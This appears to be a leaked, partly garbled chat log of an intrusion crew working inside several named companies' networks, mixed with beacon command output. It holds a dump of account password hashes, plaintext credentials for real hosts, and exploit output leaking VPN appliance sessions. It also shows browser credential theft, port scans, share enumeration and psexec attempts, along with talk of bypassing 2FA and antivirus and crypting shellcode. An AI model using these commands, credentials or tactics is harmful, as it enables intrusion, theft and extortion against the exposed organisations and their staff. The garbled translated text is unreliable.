566e5b77f23763c52e83a7788c9e14b2 4098 4647 PRH-3060$ b3307b13c3a2aec0ebef6a6258751705 4096 3258 PRH-2665$ 1a83e7caa351f127d39fd1a8d92d6d80 4096 4693 regcopier e4d271a1bcc47226f28dcbac05b8a746 66048 3338 PRH-2619$ 3e4fddf127114c3c697a233eb39bf9d9 4096 6679 PRH-3118$ c461bdecd97243d7e03bbe30c6574d96 4096 7114 PRH-3079$ 83fc2e2fe2fa464098c3791387946de4 4096 2879 PRH-2700$ 7166b10d4a7149cc548ccc76ffc19305 4096 5608 PRH-3006$ a859a85889694e7759325b985e97a05a 4096 3195 PRH-2687$ ff531fa3018d25bfeef924a5a0d3c2cc 4096 2755 PRH-2277$ 696259e4ed0d8c407f1f50bbea03ca2c 4096 2760 PRH-2256$ e6f2a18d7bff6573eda2e19e87766407 4096 3073 Internet 4e6342ecc5ed563057800830d710dd61 66048 
2765 PRH-2262$ 119e026af4c773fb82e6dad23f44ba04 4096 4691 DESKTOP-FVP2GR3$ 1b4e127fe1bbb250a7faeb1b64905620 4096 4682 klesetmoe 64f12cddaa88057e06a81b54e73b949b 66048 7148 MorrisWC 730c746b0c56134750fac4c6b09cc3b1 512 3237 PRH-2674$ 9ec59a22ac3dee9d87d544fb33f4557b 4096 6645 PRH-3084$ a6a654d1aec70e69da6a01cdc8ad284a 4096 4636 PRH-3062$ bf9e229a5d28ab7e62f0f788f8c6ee1a 4096 6657 PRH-3070$ 31caf476d2872388520203218eec76a4 4096 4622 tice f4adb5306921842dc8a1bf898d3b8d12 512 2253 scanderson 32ed87bdb5fdc5e9cba88547376818d4 66048 3247 kenglund 0a5f68a6e5f71a35090548e773865607 66048 3282 PRH-2673$ 6a1f9741dd93f24444198037e582faae 4096 2962 ap 65611c1e0782a133d661abee943f6d48 66048 6703 jweigand 3adde9cefbb0066034fbf5bd29f10f92 66048 3266 PRH-2850$ b950d2d89e39cbf02e1bcb7c6136a5c0 4096 6642 MAINT-PC$ 68c94e3b89b0085bdfb45fc233c284d6 4096 3313 PRH-2882$ dc0cb5959986ad2b2672de976274ae88 4096 7141 TFagre 698bb3058165441bd7c7677a5e3a258a 512 6649 PRH-3075$ 568ff430e4d95e26aaecddc15241c80a 4096 6652 PRH-3089$ 3716cc7a6774ae0a5c8e95bb6ed74fb2 4096 3290 PRH-2239$ 73ee8ac34792aaa70a4114401e660b28 4096 2764 PRH-2234$ 1a3628e26d311e210900e78f3550de84 4096 4678 PRH-3114$ b71b17fdf762fafecec3029454d76e8f 4096 4679 PRH-3106$ 4b23fbe17aa8ba625b7e1715f2656fc9 4096 2729 PRH-2933$ bad5fcbf55f954e3ec65909ec34de1f0 4096 6644 PRH-3065$ 67a03f5b5b542e9ab4327cdacd7c801c 4096 7121 PRH-3096$ 5be0a9f8af5732d3baae6301930839d0 4096 2757 PRH-2276$ 80b8beec30ec27b2798c7b6dba2052e8 4096 6666 PRH-MEI$ 857b2a1b3f41033f539cffe52155695e 4096 3207 PRH-2834$ a5d5812d4c70f5618a164a300d46fff3 4096 2152 PRH-1269$ 1c6153da7abbeb7056f58e93ad2c46b5 4096 4680 PRH-3110$ 9893e98370272199aff111673e2d17f1 4096 6676 PRH-3124$ 92861a7880fef85f29d0afeb051c32b3 4096 2739 PRH-2236$ 8899522f0182d3e552b92eec13bdd5aa 4096 2811 PRH-2622$ 475a68c7350d73f786f65dce73ef9842 4096 2728 PRH-2212$ 0224d77ea25db5898cc5cc0d112648cb 4096 2800 PRH-2615$ a9e26e5121903c2bde20a39fae02148e 4096 3250 PRH-2667$ d1a4a50e084c89437cb74f2a7e723022 
4096 2168 cards 61e2380be7f8f2cf2db189e3151c78ce 66048 4635 PRH-3063$ 7e10ba789f8755a9c7b6373a99247076 4096 7112 PRH-3083$ f65d6477e2366f0a0fd1a7ae8da96bf1 4096 4648 MOIT$ 44ccc7cf02cb8675b9044c63fae7a769 4096 2812 PRH-2621$ 8d4960c3800797d0b5d06e05436f7855 4096 3136 PRH-2620$ 50a089f04ebfebde6876a272349a069f 4096 2617 PRH-0084$ 4dbdc968f6be735671b93ffa8a1ba2fd 4096 4620 PRH-2903$ 8ada3e3d22e8d411b43a63bf69a1a265 4096 7118 PRH-3081$ ec0044e9174328840eb8140e79382bf3 4096 3353 PRH-2966$ 9cb90cb83aa465d24ad8295faab5fe41 4096 6683 PRH-3111$ b58c0252d36b3d1c51f820e7f8d263b4 4096 3241 PRH-2659$ 8f5a4e7a7ed251f2607a0050e322a4c3 4096 3238 PRH-2675$ 52333753086a032fc62ecebc34ae16f7 4096 3244 PRH-2662$ 91239dd34f0ef561349864ff673cb0fe 4096 2867 sschmid 16a29d27277d8d2c3716adfe89102348 512 2644 PRH-2135$ d87cc5f450f0c702ba9a4eb8d117a9b9 4096 3020 CLINIC-LENOVO$ 9d276026a118352babecd0608ea9a541 4096 4663 sstorck fc191f14aea279d501e6e7fa4140c489 66048 6701 terickson dae2c852487dccdb6207a51353b6ca01 66048 4685 alharnisch ee098fd8f7bd735743966c13570a0086 66048 4634 PRH-3082$ 5ad42d43a2a22815036142cef8d5972a 4096 7115 PRH-3088$ ae913c8772f0a710609d417487bd45a7 4096 2472 jsplichal 28761d18c08f46ba9e4af80a34a955fe 66048 3311 PRH-2872$ efb1073b10100eea274f43815ee98e1f 4096 4638 kbrown e72d306b4355e39ff4b05212cd98c15a 66048 7133 PRH-3126$ cc8ac6ee166cf04445198e7032796c85 4096 3257 PRH-2670$ a77bae0344da98dfa3c4e8bba73b8af8 4096 3275 PRH-26679$ 2be3023f9c0114ff397e895344212974 4096 3281 PRH-2677$ 5de7f8563add8809eb018d4a34f3644a 4096 3185 PRH-2617$ 178998385c222fea638da8b4a55ebb13 4096 4674 PRH-3122$ 485b0ceca0561b73dd484ce61c27a12a 4096 3268 PRH-2680$ 0ef49b5060537f7c62f5a7fe704f139e 4096 3240 PRH-2658$ a4fb0e802f0ef8f244d6251ad180e19b 4096 2658 mdanelke 4ad6fab667ac92f0f5f3a2e45c8c49da 66048 2745 PRH-2257$ 5a2c8fa3a78cef0747c434cf46a57928 4096 6636 jcarter fc83a57b90d4748f68fd474b4ce0b07e 512 3362 PRH-2923$ 7191c40b33bca86cf240acb63d3cc5da 4096 2782 order 
eb3c1b2253c1abf545acb0db00704806 66048 3246 PRH-2663$ 77c3176ef2d7642ddac6d85736be174f 4096 7110 PRH-2993$ 350a7dc227a0ecd4c9ad528885f33223 4096 2881 PRH-2702$ 0a3f399eaa21662e57f0695d5c86398f 4096 3356 PRH-2975$ 1df40826b608198f88479f329b54019f 4096 7123 kmikkelson $4daa86c8f9a4cf8aed1e49513b57a104 66048 3243 PRH-2202$ e4d66e7fb0499f2dff51d72829f0a7b5 4096 6654 PRH-3077$ 8e5c3d07af7cd48e511f5518726b999 4096 3231 PRH-2119$ 18c1b205ba5c27c68904db362597c5d3 4096 6674 PRH-3131$ 03988e64ab2246df567dfdf22f839d06 4096 3317 PRH-2881$ 20b4ed6e8977599ac239d5cfeb97145c 4096 6692 mwenzel 3a6fbaea894360a3d55b2a21d839a70c 66048 6693 tsyversongrant 3a062933b5976cbff2ab61155bb511b5 512 4639 PRH-3067$ 9ed411ce8029085f69494997ccf6a9fe0 4096 7134 PRH-3113$ 73db7c55fea363947cbe6ad5ef5f70e9 4096 3245 PRH-2661$ 328ac1ecc07035afec94cf80163b8c6c 4096 5618 PRH-2678$ c60bf8b519df9b11568b0e7ed28f13f1 4096 3252 PRH-2666$ 870177f36cafe4b0ecaa13d10dd8355 4096 2854 sdenoble eb3c1b2253c1abf545acb0db00704806 66048 7113 PRH-3076$ 54935d148299e8c40e11c9987b12a96e 4096 3327 PRH-2683$ ffbe9c9af24c640a65681ccddc2de8e9 4096 4629 PRH-2992$ 737e07ed24a35ded2b9691c188e46eac 4096 4615 ewoodke 64f12cddaa88057e06a81b54e73b949b 66048 3042 tracking c39f2beb3d2ec06a62cb887fb391dee0 66048 3242 PRH-2660$ 44caef032b5ced7d2b1d49f7e15e810f 4096 3193 ambulance 74b97c4ce24198d4af22db7910f3ef75 66048 2976 cr 7311df4eac99d671e447bd797ddc8d7f 66048 3259 PRH-2664$ 68846af71a5b1f8995ff99aad561871b 4096 3190 KRIS-PRH-2685$ bacb03d24484cc94f3db1153982ba146 4096 2562 cosborne 581ffce63b88cbab82f6decb9a5eb6a2 66048 3346 PRH-2240$ 50d6f80d816f30e90d2e7cbd1ca3e4af 4096 7605 SPARE-2020$ a2bb2a57c709ea006628818c29dc481d 4096 5614 jennen 5ca241a638da398b2275af36914a1d94 66048 3017 fbackman 2d09850f9d73356e8b229419fa4c8ccb 66048 7128 PRH-3129$ 297208f2af96f7dca6c96087eadb4ba4 4096 7104 PRH2909$ 932ad6e3cc9376702f849f67d1fc6644 4096 2412 jmcnamar 19f8313a6e13e016e7be22cc394be49a 66048 2243 mamundson 54cf67c3581e8f28dac96f5cbff80570 
66048 4637 jwulff 63d67b406723fac633524f98d6011302 66048 3357 PRH-2919$ b9a0d8b26f174ac3b12b9a4049ac2ec4 4096 1235 nlarson 64f12cddaa88057e06a81b54e73b949b 66080 2928 acarr f25e966e3cbc04a7c274b71457497d34 66048 5612 tnyreen 64f12cddaa88057e06a81b54e73b949b 66048 1239 SLV 64f12cddaa88057e06a81b54e73b949b 66080 6689 STOCK_LS$ c4517504b54f9ef3501ae2d774d4b679 4096 6633 ldivald 64f12cddaa88057e06a81b54e73b949b 66048 2847 crohloff ff366185621b9430eaa0bdd22c34408a 66048 6690 DIVALD-2020$ c39bb181960387e05f9b8feee7f829af 4096 3261 dlesmeister b488feb87b8744f87650c094779a4cfa 512 2324 smartin 39a6ccd7d6d2babdd11650ca3e4f2e7f 66048 3330 JFS-JOHNFSTOCK$ 306104c9fd5a890eda9b3a777fe7f570 4096 2483 pholmes 9361c8cfcbe72efc56fbfc38bfd3ac34 66048 4664 swilson 2dc9c0e9a9dbf55f0945ce24fb5e7fa5 66048 3173 gwenstrom e2d2aadee156f45baa63e6b6d9e1822a 66048 2200 spl 6f70de922592d49a9fd650eff31d3b34 66048 1223 JKR 48b01180c8576019c6fd63ee4dfb1444 66080 2294 jstock a273e25d41c20e4f5c4db65b47ed7593 66048 2585 sschmall 210b68c4a2a5725bd5197f38eff6911a 66048 3294 aseger 3a79a42a68d85d852cd11c2879b8afc0 66048 2336 aaltamirano 14633fe81d99ada0956694ccef9c77e7 66048 2794 akowalski d513b1530aad3647fc22f56f8deb33ac 66048 6680 PRH-3112$ 10fb6ab39d766ffcaf49880337f2fe94 4096 3315 PRH-2878$ 36ab8132a68234534f69d2fd9799fe7c 4096 6682 PRH-3116$ 460edfc9c6ac035b6f43ba370b0931ce 4096 2772 cpadmin c817d427000071f7e372e9ee4405f0e1 66048 3345 PRH-1250$ 50c37bce23b29221870fe50c65e1b7ff 4096 1209 bmoore 03096f8607f2f99d8e56d9b63965a2cd 66080 2672 tschmidt 0484108954680796ae055f0a1f4389ac 66048 3041 vlee 6017f27b91078de3dadd26256c5e38bf 512 3068 treadmill 7d60508599c6f6eea2e7957f7482782a 66048 2222 mblair 1eadba7d484394d956fae10223c98a51 66048 3092 MAIL$ 51a02ca6c0fffa13df8ac9f6f298838d 4096 3027 canderson 0c05952f0ef5da033b14ec18bc32d4b1 66048 2626 jdahle 64f12cddaa88057e06a81b54e73b949b 66048 2491 jolsen b35fd07bb31f9518dd01b29a8bc67f13 66048 3094 aathey 32e198b25c1bca58629b6282b4b69ac8 66048 6615 thovde 
64f12cddaa88057e06a81b54e73b949b 66048 6608 PRH-3008$ 38202670d12d4c3b61f7b42a8dd5c1f7 4096 3066 PRH-3000$ 996a2fdc1c49fc81a6e39c44ab53edc4 4096 7153 mtoso a1bfa9473289b6f10f741d90c0fc0450 512 3318 PRH-2876$ 914627e69b5b63a93f56f2c33bf245c4 4096 3364 ___VMware_Conv_SA___ 7e6680540cba43fd971c160ad4e483d6 66048 7143 DESKTOP-M3CLUMV$ aecc192c549c84e506675e3515bd9872 4096 2137 mwood 679f896c6af8720a9ac9ca7b3fa50d25 66048 2280 kdaly 64f12cddaa88057e06a81b54e73b949b 66048 2836 PRH-2273$ f3a5088e090b552c11e13666165cf1b1 4096 7137 PRH-2790$ 6db68b8974bedd975b742610c00e9e69 4096 2810 PRH-2623$ 35fad9d1f36911e0ebcd46834252e627 4096 6681 PRH-3123$ 5ea86b4846b81644dcfac0537eec0681 4096 3307 PRH-2873$ 0b69c9eff062308d3d3c52403cefa089 4096 2116 PRH-2979$ 72b4fced4bb842a6de5fbc91a8e916fb 4096 4696 AThormodson 99e86640e8059a212fa80d8c99bfa0d2 512 6706 LRH000262$ 41b2e6741584b2f7c92a4768a2b88cde 4096 2228 tha 722dd030aca3a775fe4a3537b412dd2d 66048 1206 chartroom 7ce21f17c0aee7fb9ceba532d0546ad6 66080 2553 nhoffman cb0abaa50a8f3dc4fc24f04548a41389 66048 4657 PRH-3103$ b6bfc4ba92977ca9a9a82e442ab6a157 4096 6617 Lungs d4c31c67a8e1e9c5a901608fc053e86d 66048 5616 bsmith 64f12cddaa88057e06a81b54e73b949b 66048 2515 rlien 2d3bffbe9b944bac2416622293868061 66048 2665 dsperr 30baf37feb6e2f61e0c2ad226b7ec372 66048 4697 mtkerr e20e421380a905858cd7cca7e2334712 66048 3342 sborsgard b3255351d8dfe7cdedf3f552a49146d6 66048 3312 PRH-2874$ ddd0b075c561be1bd6107e1f8089ae48 4096 7108 jthompson cd9537fd09f00f0377c186febc42b3eb 66048 2906 arisbrudt 64f12cddaa88057e06a81b54e73b949b 66048 2326 nolson becedb42ec3c5c7f9655255338be4453c 66048 3208 sberg 64f12cddaa88057e06a81b54e73b949b 66048 3096 pgorman 6b8ba5f3aae982855e5551b8c7936d53 66048 7109 rjhoyt e690e3bf09962403b980bb6b81f3df5f 66048 3071 FPSERVER$ 43e376323eadee8b16c7989c8df01359 532480 6699 jtotland 218143d40917d213ef5dd38998ee45e0 66048 2618 ituser ab310ea1a05dc32528c9e5102a26b294 66048 2675 kgerber 14a6939d98f10b267219e6374ef230cd 66048 2880 
under the juicebox here try it

I tried to log in under nelson, but so far no luck with the mail, what's going on?
I've calmed down now.

beacon> ls C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[*] Tasked beacon to list files in C:\Users\cmelliott\AppData\Local\Microsoft\Edge
[+] host called home, sent: 77 bytes
[*] Listing: C:\Users\cmelliott\AppData\Local\Microsoft\Edge\
 Size     Type     Last Modified         Name
 ----     ----     -------------         ----

Give me a listing of the hedgehog folder. He uses Chrome.
I don't know how to remove it.
So he didn't have a hedgehog or did he?
10.10.220.45:445 (platform: 500 version: 5.1 name: PAULSANDERSON domain: FFMG)
and not in the browser directory he's looking in, the vault
sharp web is outdated for hedgehog
no, the word domain confused me))
password and address 192.168.188.64 aDfoj344*#l2eh2
want to get into the radius?
[!] found radius domain creds
[+] aDfoj344*#l2eh2@192.168.188.64
How do you parse this? Where is the login, where is the password?
pngcpower.com
Krasavchik)
ekseshnik assembled, downloaded by browser and ran as pulled?
Yes, I already pulled everywhere, I will try to go on and under the other actors
also blocked everything?
i have no way to generate backup codes, as @user8 says to work through vpn
obratis to @user8, as an option is to put backup codes to bypass 2fa
tried to open the network management to see the ip - so it immediately disconnects, but there it does not give anything
does not let up? there rpnomo can connect?
came in, but there cmd is turned off, verashell does not start.
I logged in, but it's not like I'm logged in, I can't log in, I have no authorization, the session key might have changed.
login via session
capture,
login via session 2fa
open ip - login/password
what are the creds then?
[+] Checking URL https://205.236.0.43
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.9-26sv
What's the sma?
the creds from the sma are not working so hot, so go to work right now + and the new coba
In session 2fa vpn
[+] Checking URL https://205.236.0.43
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.9-26sv
[+] Leaking sessions to dump configuration.
[+] Attempting to dump sessions from https://205.236.0.43
[+] Done with https://205.236.0.43, found 4 sessions
[+] Looking for RADIUS domain creds
[+] Found radius domains, parsing
[!!] Found radius domain creds
[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
snipermail didn't work? maybe the password will match, it looks like we'll have to go through it, it's unlikely that the foreman has access to backups, it's a developer's car of some kind
http://pdiprodweb/FocalPoint/Login.aspx what do we got here?
Want hostnames - write hostnames locally in the hosts file, and the ips don't resolve sox hostnames again?
Although it is unlikely there is a backup system.
URL : https://system.netsuite.com/
Agalol)
URL : http://wwsql01/ Username : sa Password : sa
[*] Beginning Google Chrome extraction.
[+] received output:
[*] Finished Google Chrome extraction.
[*] Beginning Edge Extraction.
[*] Finished Edge extraction.
[*] Done.
User: mapusatera - IP Address: 192.168.0.164
User: DBunte - IP Address: 192.168.90.2
User: gkeller - IP Address: 192.168.0.162
User: Quser - IP Address: 192.168.13.57
https://mail.datotel.com/owa/
http://192.168.0.10:3000
http://192.168.0.9:3000/auth/login?redirect=%2F
Did you find anything outside the domain by the way? try snipermail? try going into the mail https://192.168.0.115/ - nimble? nabble?
BACKUPDVR.waterway.com 192.168.0.46:443 192.168.0.46:80 ``We'll make sure everyone's found no movement yet,`` beacon> portscan 192.168.0.119 1-10000 icmp 1024 [*] Tasked beacon to scan ports 1-10000 on 192.168.0.119 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete ?™s replica off so 100% loss anrichable makes no sense, you have to scan from those ports which are lossy to some ports 100% lossmoy not paying attention (it with some computers anrichable `Destination host unreachable` so what's the trick is ``. Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data: Reply from 192.168.0.192: Destination host unreachable. Ping statistics for 192.168.0.119: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000 `````` Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:05:54> portscan BACKUP 1-10000 icmp 1024 [*] Tasked beacon to scan ports 1-10000 on BACKUP [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:06:18> shell ping BACKUP -n 1 [*] Tasked beacon to run: ping BACKUP -n 1 [+] host called home, sent: 47 bytes [+] received output: Pinging BACKUP.waterway.com [192.168.0.119] with 32 bytes of data: Reply from 192.168.0.192: Destination host unreachable. Ping statistics for 192.168.0.119: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Teemo[PDIPRODWEB]SYSTEM */728|2020Dec28 01:08:09> portscan 192.168.0.119 1-10000 icmp 1024 [*] Tasked beacon to scan ports 1-10000 on 192.168.0.119 [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete `````` datavault Waterway727 domainrestore Waterway727 mapusatera Gators1853 Administrator 1853Gators veeam_admin 99Waterway Applied Waterway99 DBunte Waterway99 gkeller Waterway76 SEnglert Waterway99! 
Can I have these hashes, please?
Yeah, wait a minute...) Maybe we'll do the same thing with Linux.)
Yeah, we'll do the same thing with Linux + a > delitvot; we'll also lose there then.
OK, I thought it was inside.)))
At the bottom the forebar from your dedicaaaanoooo.
Listen, I don't know how to look at the admin list on this thing: https://192.168.0.42 https://192.168.0.43 https://192.168.0.75 https://192.168.0.77
I used smb_login + wasn't allowed to write it, right? Everyone went there as a user, only he didn't even let me see the shares and I couldn't check the lats. Is 445 closed?
Great, as on the 3rd picture, and in the folders are such files as on the 2nd picture, and in it are such folders.
Nasik, did you get into the backup?
And tried to break through? And the socket is open:
198.61.195.78:5948
198.61.195.78:1433
198.61.195.78:21 (220 Microsoft FTP Service)
That would be a good place to start. Let me scan the ports. Wasn't there an RDP port? Or 445?
```
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 23:32:52> shell ping raxdb.waterway.com -n 1
[*] Tasked beacon to run: ping raxdb.waterway.com -n 1
[+] host called home, sent: 59 bytes
[+] received output:

Pinging raxdb.waterway.com [198.61.195.78] with 32 bytes of data:
Reply from 198.61.195.78: bytes=32 time=19ms TTL=114

Ping statistics for 198.61.195.78:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```
No, why not? I'm trying to pick up passwords from browsers and mimikatz; the technicians' are empty? I'm picking up a password under the HERE that TL2 planted. So what do we have here?
```
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:59:37> shell net view \\CLEBACKUP2020 /all
[*] Tasked beacon to run: net view \\CLEBACKUP2020 /all
[+] host called home, sent: 60 bytes
[+] received output:
System error 5 has occurred.

Access is denied.

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:54:41> shell net view \\MWEISSDESKTOP /all
[*] Tasked beacon to run: net view \\MWEISSDESKTOP /all
[+] host called home, sent: 60 bytes
[+] received output:
Shared resources at \\MWEISSDESKTOP

Share name                Type   Used as  Comment
-------------------------------------------------------------------------------
ADMIN$                    Disk            Remote Admin
Brother HL-5450DN series  Print           Brother HL-5450DN series
C$                        Disk            Default share
IPC$                      IPC             Remote IPC
print$                    Disk            Printer Drivers
The command completed successfully.

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:01> shell net view \\U20OFFICENEW /all
[*] Tasked beacon to run: net view \\U20OFFICENEW /all
[+] host called home, sent: 59 bytes
[+] received output:
Shared resources at \\U20OFFICENEW

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$      Disk           Remote Admin
C$          Disk           Default share
E$          Disk           Default share
IPC$        IPC            Remote IPC
The command completed successfully.
```
```
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:55:42> shell net view \\DVRNEWBACKUP20 /all
[*] Tasked beacon to run: net view \\DVRNEWBACKUP20 /all
[+] host called home, sent: 61 bytes
[+] received output:
Shared resources at \\DVRNEWBACKUP20

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$      Disk           Remote Admin
C$          Disk           Default share
IPC$        IPC            Remote IPC
The command completed successfully.

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:56:09> shell net view \\KCNEWBACKUP2020 /all
[*] Tasked beacon to run: net view \\KCNEWBACKUP2020 /all
[+] host called home, sent: 62 bytes
[+] received output:
Shared resources at \\KCNEWBACKUP2020

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$      Disk           Remote Admin
C           Disk
C$          Disk  Z:       Default share
IPC$        IPC            Remote IPC
The command completed successfully.

Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 21:56:34> shell net view \\WATERWAY43OFFIC /all
[*] Tasked beacon to run: net view \\WATERWAY43OFFIC /all
[+] host called home, sent: 62 bytes
[+] received output:
System error 53 has occurred.

The network path was not found
```
http://192.168.0.3:5000 - NAS
NAS (Nimble Storage) login/pass Administrator\1853Gators
https://192.168.0.42:443
https://192.168.0.43:443
https://192.168.0.75:443
https://192.168.0.77:443
\\192.168.0.164 - check the machine for important information
Unknown Unix servers (eshi?)
192.168.0.10:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
192.168.0.9:22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1)
```
192.168.0.159:445 (platform: 500 version: 6.1 name: MWEISSDESKTOP domain: WATERWAY)
192.168.20.2:445 (platform: 500 version: 10.0 name: U20OFFICENEW domain: WATERWAY)
192.168.42.2:445 (platform: 500 version: 10.0 name: DVRNEWBACKUP20 domain: WATERWAY)
192.168.30.2:445 (platform: 500 version: 10.0 name: KCNEWBACKUP2020 domain: WATERWAY)
192.168.43.2:445 (platform: 500 version: 10.0 name: WATERWAY43OFFIC domain: WATERWAY)
```
user9 user8 user4: in fact all the machines that I see (those that are in AD) I can connect to or pull, but the feeling is that I'm missing something or looking in the wrong direction. If you take it completely, then I have not found an area (want something I can connect to), did not find how to disable AV and did not find cloud backups (stalin said they have cloud, something like that he mentioned).
And what's the problem? It uses Hyper-V.
`WATERWAY\blauer 11915Admin2179!` only his clips found.
mapusatera Applied djarden blauer
I checked these users. So what do we have? Burned; it means before this cmd was running. And how was your tpsh working before this? OK, I'll give you a replacement. Give this skipnet, worth a try?
Fix 3. Stop the process of the related .dll
It's not even there, why not just turn it off? It's like the most harmless thing you can do.
Press Win + R on your keyboard. Type in taskschd.msc and press Enter. In the Task Scheduler click on Task Scheduler Library once. Right-click on the BackgroundContainer task and select Delete.
There's a fix2. What? I think the second option to try: http://ugetfix.com/ask/how-to-fix-the-specified-module-could-not-be-found-error-on-windows/
Running chrome, even this error is better with or without exe. Hex the same, need to write rundll32.exe? yuk win r > rundll32 ... I'll build you exe and dll, start with dll. Can I run rundll through ran?
Let me build the shellcode myself, or you through a cool cryptor? + do not forget only to download through incognito and tdn. Let's try; the load will be dirtier, though the meaning if not, shells do not work... and the link through chrome, download by rundll to download it in cobemo. Try load exe, load in cobemo? And temp.dll is there.
And with this also when I put the load tpsh in ran - the same error, or win r > cmd /c echo 123 > C:\file.name; win r > load tpsh. Prefer to not run the GUI version. win r > cmd; win r > powershell. And how do you use it? Through ran it's exactly the same, so you should also find it. You can search for gtz keybind. I'll do it on win r over rd; pops up; this will open the gtz menu. Try win + r; tried just a shortcut from startup, creating a shortcut. How do you start it? When you run verashell it's the same. When you run cmd over rd there are still no sessions?
```
beacon> shell net user ndevbernst /dom
[*] Tasked beacon to run: net user ndevbernst /dom
[+] host called home, sent: 56 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.
```
Today almost all of the offreleases' comps didn't give anything either; no web services found, no whining either. Let relay and let's go home.) What was the result yesterday? All hello, a login or remove action. It's weird, of course, it's in the network but with 2FA.
The standard practice of all EDR systems. Forsom 2FA by default on the mail? And 2FA where? Strange that it is within the network but with 2FA. I remember 2FA mail kazhikkaa admin from the cassie found, like yes? No admin found. 7buildtrt 100% no, we have cassie that does not respond to us at all. You have problems here with the AV, yes? Aha, the original was https://github.com/djhohnstein/SharpShares; rolled up the software ourselves or what?
Yes, there is no git yet; test it while you can. Original name or link to git? Threads: how much will you say? There is one. SharpSharesNG can run a batch on every worked-out host; will this really be fast? The network is big enough, psexec does not work fast; would there be some multi-threaded tool? To all letters of the alphabet, then the batch that checks the drive with a label, to the letters of the label + $)) but your version I like more. From my point of view it's just the right thing to do in the batch. Why? I thought you had a cycle of available drives, not to choose "where any"; there simply all possible logical drives are prescribed, available or not. I didn't save it because it's very dumb. Psexec throughout the domain?) And I won't even answer this question.) Is there a batch file? But if I additionally share, it's impossible to fuck something up in the process, which is also self-mappable. We'll prioritize them for the network. Why? We need to upload them to the label all the same? On the absolute access to share ALL disks on ALL PCs, do you get it? It's when we upload to ALL servers a batch file which opens ALL the shares, which increases the fucking coverage and speed. By the way, there's another cool thing. Let's try to increase the percentage of closed "area" on the network;) Wake up all PCs in the network: Wake On LAN. To @tl2: what the ox? Is it a question for us? By the way, will this network be nailed with WOL? Begitenu, after pinging through SharpSharesNG there are more of them.) Prank servers.) 71 servers of 53 alive?
53 servers (71 alive)
winona.rtpco.local: 118 machines in AD, 64 armies on Windows (10 alive), 53 servers (71 alive)
I'm gonna re-populate everything before we shut down.
Forget about it. @tl2 seems to be a rudiment. That's the one above; it's different.
richmondDC2.us.alloypolymers.com
```
beacon> shell dnscmd us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd us.alloypolymers.com /info
[+] host called home, sent: 64 bytes
[+] received output:
Query result:
Server info
    server name               = RichmondDC2.us.alloypolymers.com
    version                   = 25800306 (6.3 build 9600)
    DS container              = cn=MicrosoftDNS,cn=System,DC=us,DC=alloypolymers,DC=com
    forest name               = us.alloypolymers.com
    domain name               = us.alloypolymers.com
    builtin forest partition  = ForestDnsZones.us.alloypolymers.com
    builtin domain partition  = DomainDnsZones.us.alloypolymers.com
    read only DC              = 0
    last scavenge cycle       = not since restart (0)
Command completed successfully.

beacon> shell dnscmd gaproc.us.alloypolymers.com /info
[*] Tasked beacon to run: dnscmd gaproc.us.alloypolymers.com /info
[+] host called home, sent: 71 bytes
[+] received output:
Info query failed
    status = 1722 (0x000006ba)
Command failed:  RPC_SERVER_UNAVAILABLE     1722    0x6BA
```
Maybe it's about dnscmd? Maybe that's what I was poking at? Re-scanning seabell.
```
Entry : gaproc.us.alloypolymers.com
Name  : gaproc.us.alloypolymers.com
Data  : 192.168.1.121
Entry : gaproc
Name  : gaproc.us.alloypolymers.com
Data  : 192.168.1.121
```
If it's not in the DNS entries of the domain controllers, then if there is no other way to check it, skip it; there's nothing to see in AD, it's not there.
```
Teemo[WINDC2]SYSTEM */4284|2020Dec25 01:04:37> portscan 192.168.3.0/24 1-10000
[*] Tasked beacon to scan ports 1-10000 on 192.168.3.0/24
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```
Let's leave it at that time.
```
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:57:22> remote-exec psexec 89.0.10.104 tasklist
[*] Tasked beacon to run 'tasklist' on 89.0.10.104 via Service Control Manager
[+] host called home, sent: 1998 bytes
[-] Could not open service control manager on 89.0.10.104: 1728
```
We won't make any unnecessary noise. I think there are backups, but they're all visible.
```
Teemo[WINDC2]SYSTEM */4284|2020Dec25 00:56:06> shell tasklist /v /s 89.0.10.104
[*] Tasked beacon to run: tasklist /v /s 89.0.10.104
[+] host called home, sent: 57 bytes
[+] received output:
ERROR: The RPC server is unavailable.
```
Do a scan here too on /24.
```
--- Chromium Credential (User: dch) ---
URL      : http://192.168.3.254:5000/webman/login.cgi
Username : admin
Password : 11Dennis
```
